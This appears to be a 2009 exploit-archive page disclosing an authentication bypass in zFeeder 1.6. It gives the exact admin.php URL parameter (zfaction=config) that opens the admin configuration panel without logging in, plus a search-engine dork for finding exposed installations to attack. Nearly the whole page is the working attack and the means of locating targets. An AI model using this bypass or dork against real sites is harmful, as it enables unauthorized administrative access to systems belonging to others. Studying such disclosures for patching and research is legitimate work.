[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : zFeeder 1.6 (admin.php) No Authentication Vulnerability
# Published : 2009-02-23
# Author : ahmadbady
# Previous Title : Qwerty CMS (id) Remote SQL Injection Vulnerability
# Next Title : pPIM 1.01 (notes.php id) Remote Command Execution Exploit
-----------------:remote bypass admin panel:-----------------
-------------------------------------------------------
script:zfeeder 1.6
------------------------------------------------------------------
download from:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/z/zv/zvonnews/zfeeder-1.6.zip
------------------------------------------------------------------
.......................................................
xpl:
http://127.0.0.1/path/admin.php?zfaction=config
------------------------------------------------------
dork: intitle:"zFeeder admin panel"
-----------------------------------------------------
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
---------------------------------------------------
# www.Syue.com [2009-02-23]